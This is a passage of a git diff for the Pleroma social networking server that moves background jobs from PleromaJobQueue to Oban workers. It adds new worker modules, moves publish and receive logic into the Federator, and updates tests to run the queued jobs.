+ when is_list(followed_identifiers) do
+ %{
+ "op" => "follow_import",
+ "follower_id" => follower.id,
+ "followed_identifiers" => followed_identifiers
+ }
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
+ end
def delete_user_activities(%User{ap_id: ap_id} = user) do
ap_id
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index 1a279a7df..8be8ac86f 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -17,6 +17,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.Web.ActivityPub.MRF
alias Pleroma.Web.ActivityPub.Transmogrifier
alias Pleroma.Web.WebFinger
+ alias Pleroma.Workers.BackgroundWorker
import Ecto.Query
import Pleroma.Web.ActivityPub.Utils
@@ -25,6 +26,8 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
require Logger
require Pleroma.Constants
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
# For Announce activities, we filter the recipients based on following status for any actors
# that match actual users. See issue #164 for more information about why this is necessary.
defp get_recipients(%{"type" => "Announce"} = data) do
@@ -145,7 +148,9 @@ def insert(map, local \\ true, fake \\ false) when is_map(map) do
activity
end
- PleromaJobQueue.enqueue(:background, Pleroma.Web.RichMedia.Helpers, [:fetch, activity])
+ %{"op" => "fetch_data_for_activity", "activity_id" => activity.id}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
Notification.create_notifications(activity)
diff --git a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
index 01d21a299..1df3bb5b6 100644
--- a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
+++ b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
@@ -7,7 +7,9 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy do
@behaviour Pleroma.Web.ActivityPub.MRF
alias Pleroma.HTTP
+ alias Pleroma.Repo
alias Pleroma.Web.MediaProxy
+ alias Pleroma.Workers.BackgroundWorker
require Logger
@@ -16,6 +18,8 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy do
recv_timeout: 10_000
]
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
def perform(:prefetch, url) do
Logger.info("Prefetching #{inspect(url)}")
@@ -30,7 +34,9 @@ def perform(:preload, %{"object" => %{"attachment" => attachments}} = _message)
url
|> Enum.each(fn
%{"href" => href} ->
- PleromaJobQueue.enqueue(:background, __MODULE__, [:prefetch, href])
+ %{"op" => "media_proxy_prefetch", "url" => href}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
x ->
Logger.debug("Unhandled attachment URL object #{inspect(x)}")
@@ -46,7 +52,9 @@ def filter(
%{"type" => "Create", "object" => %{"attachment" => attachments} = _object} = message
)
when is_list(attachments) and length(attachments) > 0 do
- PleromaJobQueue.enqueue(:background, __MODULE__, [:preload, message])
+ %{"op" => "media_proxy_preload", "message" => message}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
{:ok, message}
end
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 5403b71d8..0f117cd04 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -15,12 +15,15 @@ defmodule Pleroma.Web.ActivityPub.Transmogrifier do
alias Pleroma.Web.ActivityPub.Utils
alias Pleroma.Web.ActivityPub.Visibility
alias Pleroma.Web.Federator
+ alias Pleroma.Workers.Transmogrifier, as: TransmogrifierWorker
import Ecto.Query
require Logger
require Pleroma.Constants
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
@doc """
Modifies an incoming AP object (mastodon format) to our internal format.
"""
@@ -1073,7 +1076,9 @@ def upgrade_user_from_ap_id(ap_id) do
already_ap <- User.ap_enabled?(user),
{:ok, user} <- user |> User.upgrade_changeset(data) |> User.update_and_set_cache() do
unless already_ap do
- PleromaJobQueue.enqueue(:transmogrifier, __MODULE__, [:user_upgrade, user])
+ %{"op" => "user_upgrade", "user_id" => user.id}
+ |> TransmogrifierWorker.new(worker_args(:transmogrifier))
+ |> Repo.insert()
end
{:ok, user}
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index bb9eadfee..d85fe824f 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -3,12 +3,23 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Federator do
+ alias Pleroma.Activity
+ alias Pleroma.Object.Containment
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.ActivityPub
+ alias Pleroma.Web.ActivityPub.Transmogrifier
+ alias Pleroma.Web.ActivityPub.Utils
+ alias Pleroma.Web.Federator.Publisher
+ alias Pleroma.Web.OStatus
+ alias Pleroma.Web.Websub
alias Pleroma.Workers.Publisher, as: PublisherWorker
alias Pleroma.Workers.Receiver, as: ReceiverWorker
alias Pleroma.Workers.Subscriber, as: SubscriberWorker
require Logger
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
def init do
# 1 minute
refresh_subscriptions(schedule_in: 60)
@@ -41,7 +52,7 @@ def incoming_ap_doc(params) do
end
def publish(%{id: "pleroma:fakeid"} = activity) do
- PublisherWorker.perform_publish(activity)
+ perform(:publish, activity)
end
def publish(activity) do
@@ -68,11 +79,88 @@ def refresh_subscriptions(worker_args \\ []) do
|> Pleroma.Repo.insert()
end
- defp worker_args(queue) do
- if max_attempts = Pleroma.Config.get([:workers, :retries, queue]) do
- [max_attempts: max_attempts]
+ # Job Worker Callbacks
+
+ @spec perform(atom(), module(), any()) :: {:ok, any()} | {:error, any()}
+ def perform(:publish_one, module, params) do
+ apply(module, :publish_one, [params])
+ end
+
+ def perform(:publish, activity) do
+ Logger.debug(fn -> "Running publish for #{activity.data["id"]}" end)
+
+ with %User{} = actor <- User.get_cached_by_ap_id(activity.data["actor"]),
+ {:ok, actor} <- User.ensure_keys_present(actor) do
+ Publisher.publish(actor, activity)
+ end
+ end
+
+ def perform(:incoming_doc, doc) do
+ Logger.info("Got document, trying to parse")
+ OStatus.handle_incoming(doc)
+ end
+
+ def perform(:incoming_ap_doc, params) do
+ Logger.info("Handling incoming AP activity")
+
+ params = Utils.normalize_params(params)
+
+ # NOTE: we use the actor ID to do the containment, this is fine because an
+ # actor shouldn't be acting on objects outside their own AP server.
+ with {:ok, _user} <- ap_enabled_actor(params["actor"]),
+ nil <- Activity.normalize(params["id"]),
+ :ok <- Containment.contain_origin_from_id(params["actor"], params),
+ {:ok, activity} <- Transmogrifier.handle_incoming(params) do
+ {:ok, activity}
else
- []
+ %Activity{} ->
+ Logger.info("Already had #{params["id"]}")
+ :error
+
+ _e ->
+ # Just drop those for now
+ Logger.info("Unhandled activity")
+ Logger.info(Jason.encode!(params, pretty: true))
+ :error
+ end
+ end
+
+ def perform(:request_subscription, websub) do
+ Logger.debug("Refreshing #{websub.topic}")
+
+ with {:ok, websub} <- Websub.request_subscription(websub) do
+ Logger.debug("Successfully refreshed #{websub.topic}")
+ else
+ _e -> Logger.debug("Couldn't refresh #{websub.topic}")
+ end
+ end
+
+ def perform(:verify_websub, websub) do
+ Logger.debug(fn ->
+ "Running WebSub verification for #{websub.id} (#{websub.topic}, #{websub.callback})"
+ end)
+
+ Websub.verify(websub)
+ end
+
+ def perform(:refresh_subscriptions) do
+ Logger.debug("Federator running refresh subscriptions")
+ Websub.refresh_subscriptions()
+
+ spawn(fn ->
+ # 6 hours
+ Process.sleep(1000 * 60 * 60 * 6)
+ refresh_subscriptions()
+ end)
+ end
+
+ def ap_enabled_actor(id) do
+ user = User.get_cached_by_ap_id(id)
+
+ if User.ap_enabled?(user) do
+ {:ok, user}
+ else
+ ActivityPub.make_user_from_ap_id(id)
end
end
end
diff --git a/lib/pleroma/web/oauth/token/clean_worker.ex b/lib/pleroma/web/oauth/token/clean_worker.ex
index dca852449..c0c9c3653 100644
--- a/lib/pleroma/web/oauth/token/clean_worker.ex
+++ b/lib/pleroma/web/oauth/token/clean_worker.ex
@@ -14,9 +14,12 @@ defmodule Pleroma.Web.OAuth.Token.CleanWorker do
[:oauth2, :clean_expired_tokens_interval],
86_400_000
)
- @queue :background
+ alias Pleroma.Repo
alias Pleroma.Web.OAuth.Token
+ alias Pleroma.Workers.BackgroundWorker
+
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
def start_link, do: GenServer.start_link(__MODULE__, nil)
@@ -31,8 +34,11 @@ def init(_) do
@doc false
def handle_info(:perform, state) do
+ %{"op" => "clean_expired_tokens"}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
+
Process.send_after(self(), :perform, @interval)
- PleromaJobQueue.enqueue(@queue, __MODULE__, [:clean])
{:noreply, state}
end
diff --git a/lib/pleroma/web/push/push.ex b/lib/pleroma/web/push/push.ex
index 729dad02a..b4f0e5127 100644
--- a/lib/pleroma/web/push/push.ex
+++ b/lib/pleroma/web/push/push.ex
@@ -3,10 +3,13 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Push do
- alias Pleroma.Web.Push.Impl
+ alias Pleroma.Repo
+ alias Pleroma.Workers.WebPusher
require Logger
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
def init do
unless enabled() do
Logger.warn("""
@@ -31,6 +34,9 @@ def enabled do
end
end
- def send(notification),
- do: PleromaJobQueue.enqueue(:web_push, Impl, [notification])
+ def send(notification) do
+ %{"op" => "web_push", "notification_id" => notification.id}
+ |> WebPusher.new(worker_args(:web_push))
+ |> Repo.insert()
+ end
end
diff --git a/lib/pleroma/web/twitter_api/controllers/util_controller.ex b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
index 3405bd3b7..7ba4ad305 100644
--- a/lib/pleroma/web/twitter_api/controllers/util_controller.ex
+++ b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
@@ -265,12 +265,7 @@ def follow_import(%{assigns: %{user: follower}} = conn, %{"list" => list}) do
String.split(line, ",") |> List.first()
end)
|> List.delete("Account address") do
- PleromaJobQueue.enqueue(:background, User, [
- :follow_import,
- follower,
- followed_identifiers
- ])
-
+ User.follow_import(follower, followed_identifiers)
json(conn, "job started")
end
end
@@ -281,12 +276,7 @@ def blocks_import(conn, %{"list" => %Plug.Upload{} = listfile}) do
def blocks_import(%{assigns: %{user: blocker}} = conn, %{"list" => list}) do
with blocked_identifiers <- String.split(list) do
- PleromaJobQueue.enqueue(:background, User, [
- :blocks_import,
- blocker,
- blocked_identifiers
- ])
-
+ User.blocks_import(blocker, blocked_identifiers)
json(conn, "job started")
end
end
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
new file mode 100644
index 000000000..3ab2b6bcc
--- /dev/null
+++ b/lib/pleroma/workers/background_worker.ex
@@ -0,0 +1,66 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.BackgroundWorker do
+ alias Pleroma.Activity
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy
+ alias Pleroma.Web.OAuth.Token.CleanWorker
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "background",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "fetch_initial_posts", "user_id" => user_id}) do
+ user = User.get_by_id(user_id)
+ User.perform(:fetch_initial_posts, user)
+ end
+
+ def perform(%{"op" => "deactivate_user", "user_id" => user_id, "status" => status}) do
+ user = User.get_by_id(user_id)
+ User.perform(:deactivate_async, user, status)
+ end
+
+ def perform(%{"op" => "delete_user", "user_id" => user_id}) do
+ user = User.get_by_id(user_id)
+ User.perform(:delete, user)
+ end
+
+ def perform(%{
+ "op" => "blocks_import",
+ "blocker_id" => blocker_id,
+ "blocked_identifiers" => blocked_identifiers
+ }) do
+ blocker = User.get_by_id(blocker_id)
+ User.perform(:blocks_import, blocker, blocked_identifiers)
+ end
+
+ def perform(%{
+ "op" => "follow_import",
+ "follower_id" => follower_id,
+ "followed_identifiers" => followed_identifiers
+ }) do
+ follower = User.get_by_id(follower_id)
+ User.perform(:follow_import, follower, followed_identifiers)
+ end
+
+ def perform(%{"op" => "clean_expired_tokens"}) do
+ CleanWorker.perform(:clean)
+ end
+
+ def perform(%{"op" => "media_proxy_preload", "message" => message}) do
+ MediaProxyWarmingPolicy.perform(:preload, message)
+ end
+
+ def perform(%{"op" => "media_proxy_prefetch", "url" => url}) do
+ MediaProxyWarmingPolicy.perform(:prefetch, url)
+ end
+
+ def perform(%{"op" => "fetch_data_for_activity", "activity_id" => activity_id}) do
+ activity = Activity.get_by_id(activity_id)
+ Pleroma.Web.RichMedia.Helpers.perform(:fetch, activity)
+ end
+end
diff --git a/lib/pleroma/workers/helper.ex b/lib/pleroma/workers/helper.ex
new file mode 100644
index 000000000..3286ce0e8
--- /dev/null
+++ b/lib/pleroma/workers/helper.ex
@@ -0,0 +1,13 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Helper do
+ def worker_args(queue) do
+ if max_attempts = Pleroma.Config.get([:workers, :retries, queue]) do
+ [max_attempts: max_attempts]
+ else
+ []
+ end
+ end
+end
diff --git a/lib/pleroma/workers/mailer.ex b/lib/pleroma/workers/mailer.ex
new file mode 100644
index 000000000..da7fa6fd5
--- /dev/null
+++ b/lib/pleroma/workers/mailer.ex
@@ -0,0 +1,18 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Mailer do
+ alias Pleroma.User
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "mailer",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "digest_email", "user_id" => user_id}) do
+ user = User.get_by_id(user_id)
+ Pleroma.DigestEmailWorker.perform(user)
+ end
+end
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher.ex
index 67871977a..c890ffb79 100644
--- a/lib/pleroma/workers/publisher.ex
+++ b/lib/pleroma/workers/publisher.ex
@@ -4,7 +4,7 @@
defmodule Pleroma.Workers.Publisher do
alias Pleroma.Activity
- alias Pleroma.User
+ alias Pleroma.Web.Federator
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
@@ -13,23 +13,11 @@ defmodule Pleroma.Workers.Publisher do
@impl Oban.Worker
def perform(%{"op" => "publish", "activity_id" => activity_id}) do
- with %Activity{} = activity <- Activity.get_by_id(activity_id) do
- perform_publish(activity)
- else
- _ -> raise "Non-existing activity: #{activity_id}"
- end
+ activity = Activity.get_by_id(activity_id)
+ Federator.perform(:publish, activity)
end
def perform(%{"op" => "publish_one", "module" => module_name, "params" => params}) do
- module_name
- |> String.to_atom()
- |> apply(:publish_one, [params])
- end
-
- def perform_publish(%Activity{} = activity) do
- with %User{} = actor <- User.get_cached_by_ap_id(activity.data["actor"]),
- {:ok, actor} <- User.ensure_keys_present(actor) do
- Pleroma.Web.Federator.Publisher.publish(actor, activity)
- end
+ Federator.perform(:publish_one, String.to_atom(module_name), params)
end
end
diff --git a/lib/pleroma/workers/receiver.ex b/lib/pleroma/workers/receiver.ex
index 43558b4e6..d3de95716 100644
--- a/lib/pleroma/workers/receiver.ex
+++ b/lib/pleroma/workers/receiver.ex
@@ -3,15 +3,7 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.Receiver do
- alias Pleroma.Activity
- alias Pleroma.Object.Containment
- alias Pleroma.User
- alias Pleroma.Web.ActivityPub.ActivityPub
- alias Pleroma.Web.ActivityPub.Transmogrifier
- alias Pleroma.Web.ActivityPub.Utils
- alias Pleroma.Web.OStatus
-
- require Logger
+ alias Pleroma.Web.Federator
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
@@ -20,42 +12,10 @@ defmodule Pleroma.Workers.Receiver do
@impl Oban.Worker
def perform(%{"op" => "incoming_doc", "body" => doc}) do
- Logger.info("Got incoming document, trying to parse")
- OStatus.handle_incoming(doc)
+ Federator.perform(:incoming_doc, doc)
end
def perform(%{"op" => "incoming_ap_doc", "params" => params}) do
- Logger.info("Handling incoming AP activity")
-
- params = Utils.normalize_params(params)
-
- # NOTE: we use the actor ID to do the containment, this is fine because an
- # actor shouldn't be acting on objects outside their own AP server.
- with {:ok, _user} <- ap_enabled_actor(params["actor"]),
- nil <- Activity.normalize(params["id"]),
- :ok <- Containment.contain_origin_from_id(params["actor"], params),
- {:ok, activity} <- Transmogrifier.handle_incoming(params) do
- {:ok, activity}
- else
- %Activity{} ->
- Logger.info("Already had #{params["id"]}")
- :error
-
- _e ->
- # Just drop those for now
- Logger.info("Unhandled activity")
- Logger.info(Jason.encode!(params, pretty: true))
- :error
- end
- end
-
- defp ap_enabled_actor(id) do
- user = User.get_cached_by_ap_id(id)
-
- if User.ap_enabled?(user) do
- {:ok, user}
- else
- ActivityPub.make_user_from_ap_id(id)
- end
+ Federator.perform(:incoming_ap_doc, params)
end
end
diff --git a/lib/pleroma/workers/scheduled_activity_worker.ex b/lib/pleroma/workers/scheduled_activity_worker.ex
new file mode 100644
index 000000000..a49834fd8
--- /dev/null
+++ b/lib/pleroma/workers/scheduled_activity_worker.ex
@@ -0,0 +1,15 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.ScheduledActivityWorker do
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "scheduled_activities",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "execute", "activity_id" => activity_id}) do
+ Pleroma.ScheduledActivityWorker.perform(:execute, activity_id)
+ end
+end
diff --git a/lib/pleroma/workers/subscriber.ex b/lib/pleroma/workers/subscriber.ex
index a8c01bb10..6af3ad0a1 100644
--- a/lib/pleroma/workers/subscriber.ex
+++ b/lib/pleroma/workers/subscriber.ex
@@ -4,11 +4,9 @@
defmodule Pleroma.Workers.Subscriber do
alias Pleroma.Repo
- alias Pleroma.Web.Websub
+ alias Pleroma.Web.Federator
alias Pleroma.Web.Websub.WebsubClientSubscription
- require Logger
-
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "federator_outgoing",
@@ -16,29 +14,16 @@ defmodule Pleroma.Workers.Subscriber do
@impl Oban.Worker
def perform(%{"op" => "refresh_subscriptions"}) do
- Websub.refresh_subscriptions()
- # Schedule the next run in 6 hours
- Pleroma.Web.Federator.refresh_subscriptions(schedule_in: 3600 * 6)
+ Federator.perform(:refresh_subscriptions)
end
def perform(%{"op" => "request_subscription", "websub_id" => websub_id}) do
websub = Repo.get(WebsubClientSubscription, websub_id)
- Logger.debug("Refreshing #{websub.topic}")
-
- with {:ok, websub} <- Websub.request_subscription(websub) do
- Logger.debug("Successfully refreshed #{websub.topic}")
- else
- _e -> Logger.debug("Couldn't refresh #{websub.topic}")
- end
+ Federator.perform(:request_subscription, websub)
end
def perform(%{"op" => "verify_websub", "websub_id" => websub_id}) do
websub = Repo.get(WebsubClientSubscription, websub_id)
-
- Logger.debug(fn ->
- "Running WebSub verification for #{websub.id} (#{websub.topic}, #{websub.callback})"
- end)
-
- Websub.verify(websub)
+ Federator.perform(:verify_websub, websub)
end
end
diff --git a/lib/pleroma/workers/transmogrifier.ex b/lib/pleroma/workers/transmogrifier.ex
new file mode 100644
index 000000000..c6b4fab47
--- /dev/null
+++ b/lib/pleroma/workers/transmogrifier.ex
@@ -0,0 +1,18 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Transmogrifier do
+ alias Pleroma.User
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "transmogrifier",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "user_upgrade", "user_id" => user_id}) do
+ user = User.get_by_id(user_id)
+ Pleroma.Web.ActivityPub.Transmogrifier.perform(:user_upgrade, user)
+ end
+end
diff --git a/lib/pleroma/workers/web_pusher.ex b/lib/pleroma/workers/web_pusher.ex
new file mode 100644
index 000000000..b99581eb0
--- /dev/null
+++ b/lib/pleroma/workers/web_pusher.ex
@@ -0,0 +1,19 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.WebPusher do
+ alias Pleroma.Notification
+ alias Pleroma.Repo
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "web_push",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "web_push", "notification_id" => notification_id}) do
+ notification = Repo.get(Notification, notification_id)
+ Pleroma.Web.Push.Impl.perform(notification)
+ end
+end
diff --git a/test/activity_test.exs b/test/activity_test.exs
index b9c12adb2..658c47837 100644
--- a/test/activity_test.exs
+++ b/test/activity_test.exs
@@ -6,8 +6,8 @@ defmodule Pleroma.ActivityTest do
use Pleroma.DataCase
alias Pleroma.Activity
alias Pleroma.Bookmark
- alias Pleroma.ObanHelpers
alias Pleroma.Object
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.ThreadMute
import Pleroma.Factory
diff --git a/test/conversation_test.exs b/test/conversation_test.exs
index 2ebbcab76..f917aa691 100644
--- a/test/conversation_test.exs
+++ b/test/conversation_test.exs
@@ -28,7 +28,7 @@ test "it goes through old direct conversations" do
{:ok, _activity} =
CommonAPI.post(user, %{"visibility" => "direct", "status" => "hey @#{other_user.nickname}"})
- Pleroma.ObanHelpers.perform_all()
+ Pleroma.Tests.ObanHelpers.perform_all()
Repo.delete_all(Conversation)
Repo.delete_all(Conversation.Participation)
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 80ea2a085..e1c9f4f93 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -8,6 +8,7 @@ defmodule Pleroma.NotificationTest do
import Pleroma.Factory
alias Pleroma.Notification
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.Transmogrifier
alias Pleroma.Web.CommonAPI
@@ -621,7 +622,8 @@ test "notifications are deleted if a local user is deleted" do
refute Enum.empty?(Notification.for_user(other_user))
- User.delete(user)
+ {:ok, job} = User.delete(user)
+ ObanHelpers.perform(job)
assert Enum.empty?(Notification.for_user(other_user))
end
@@ -666,6 +668,7 @@ test "notifications are deleted if a remote user is deleted" do
}
{:ok, _delete_activity} = Transmogrifier.handle_incoming(delete_user_message)
+ ObanHelpers.perform_all()
assert Enum.empty?(Notification.for_user(local_user))
end
diff --git a/test/support/oban_helpers.ex b/test/support/oban_helpers.ex
index ecc03ba1a..d379c9ec7 100644
--- a/test/support/oban_helpers.ex
+++ b/test/support/oban_helpers.ex
@@ -2,7 +2,7 @@
# Copyright © 2017-2018 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.ObanHelpers do
+defmodule Pleroma.Tests.ObanHelpers do
@moduledoc """
Oban test helpers.
"""
diff --git a/test/user_test.exs b/test/user_test.exs
index 8617752d7..9c2117a0b 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -5,9 +5,9 @@
defmodule Pleroma.UserTest do
alias Pleroma.Activity
alias Pleroma.Builders.UserBuilder
- alias Pleroma.ObanHelpers
alias Pleroma.Object
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.CommonAPI
@@ -676,7 +676,9 @@ test "it imports user followings from list" do
user3.nickname
]
- result = User.follow_import(user1, identifiers)
+ {:ok, job} = User.follow_import(user1, identifiers)
+ result = ObanHelpers.perform(job)
+
assert is_list(result)
assert result == [user2, user3]
end
@@ -887,7 +889,9 @@ test "it imports user blocks from list" do
user3.nickname
]
- result = User.blocks_import(user1, identifiers)
+ {:ok, job} = User.blocks_import(user1, identifiers)
+ result = ObanHelpers.perform(job)
+
assert is_list(result)
assert result == [user2, user3]
end
@@ -1013,7 +1017,8 @@ test "it deletes a user, all follow relationships and all activities", %{user: u
{:ok, like_two, _} = CommonAPI.favorite(activity.id, follower)
{:ok, repeat, _} = CommonAPI.repeat(activity_two.id, user)
- {:ok, _} = User.delete(user)
+ {:ok, job} = User.delete(user)
+ {:ok, _user} = ObanHelpers.perform(job)
follower = User.get_cached_by_id(follower.id)
@@ -1043,7 +1048,8 @@ test "it sends out User Delete activity", %{user: user} do
{:ok, follower} = User.get_or_fetch_by_ap_id("http://mastodon.example.org/users/admin")
{:ok, _} = User.follow(follower, user)
- {:ok, _user} = User.delete(user)
+ {:ok, job} = User.delete(user)
+ {:ok, _user} = ObanHelpers.perform(job)
assert ObanHelpers.member?(
%{
@@ -1100,7 +1106,8 @@ test "invalidate_cache works" do
test "User.delete() plugs any possible zombie objects" do
user = insert(:user)
- {:ok, _} = User.delete(user)
+ {:ok, job} = User.delete(user)
+ {:ok, _} = ObanHelpers.perform(job)
{:ok, cached_user} = Cachex.get(:user_cache, "ap_id:#{user.ap_id}")
diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
index d7f0a8264..f46353fdd 100644
--- a/test/web/activity_pub/activity_pub_controller_test.exs
+++ b/test/web/activity_pub/activity_pub_controller_test.exs
@@ -9,8 +9,8 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
import Pleroma.Factory
alias Pleroma.Activity
alias Pleroma.Instances
- alias Pleroma.ObanHelpers
alias Pleroma.Object
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ObjectView
alias Pleroma.Web.ActivityPub.UserView
diff --git a/test/web/activity_pub/mrf/mediaproxy_warming_policy_test.exs b/test/web/activity_pub/mrf/mediaproxy_warming_policy_test.exs
index 372e789be..95a809d25 100644
--- a/test/web/activity_pub/mrf/mediaproxy_warming_policy_test.exs
+++ b/test/web/activity_pub/mrf/mediaproxy_warming_policy_test.exs
@@ -6,6 +6,7 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicyTest do
use Pleroma.DataCase
alias Pleroma.HTTP
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy
import Mock
@@ -24,6 +25,11 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicyTest do
test "it prefetches media proxy URIs" do
with_mock HTTP, get: fn _, _, _ -> {:ok, []} end do
MediaProxyWarmingPolicy.filter(@message)
+
+ ObanHelpers.perform_all()
+ # Performing jobs which has been just enqueued
+ ObanHelpers.perform_all()
+
assert called(HTTP.get(:_, :_, :_))
end
end
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index e7498e005..52f46c141 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -8,6 +8,7 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do
alias Pleroma.Object
alias Pleroma.Object.Fetcher
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.ActivityPub.Transmogrifier
@@ -563,6 +564,7 @@ test "it works for incoming user deletes" do
|> Poison.decode!()
{:ok, _} = Transmogrifier.handle_incoming(data)
+ ObanHelpers.perform_all()
refute User.get_cached_by_ap_id(ap_id)
end
@@ -1132,6 +1134,8 @@ test "it upgrades a user to activitypub" do
assert user.info.note_count == 1
{:ok, user} = Transmogrifier.upgrade_user_from_ap_id("https://niu.moe/users/rye")
+ ObanHelpers.perform_all()
+
assert user.info.ap_enabled
assert user.info.note_count == 1
assert user.follower_address == "https://niu.moe/users/rye/followers"
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index e0be4342b..9ca341b6d 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -4,7 +4,7 @@
defmodule Pleroma.Web.FederatorTest do
alias Pleroma.Instances
- alias Pleroma.ObanHelpers
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Federator
alias Pleroma.Workers.Publisher, as: PublisherWorker
diff --git a/test/web/twitter_api/util_controller_test.exs b/test/web/twitter_api/util_controller_test.exs
index 640579c09..e3f129f72 100644
--- a/test/web/twitter_api/util_controller_test.exs
+++ b/test/web/twitter_api/util_controller_test.exs
@@ -4,9 +4,11 @@
defmodule Pleroma.Web.TwitterAPI.UtilControllerTest do
use Pleroma.Web.ConnCase
+ use Oban.Testing, repo: Pleroma.Repo
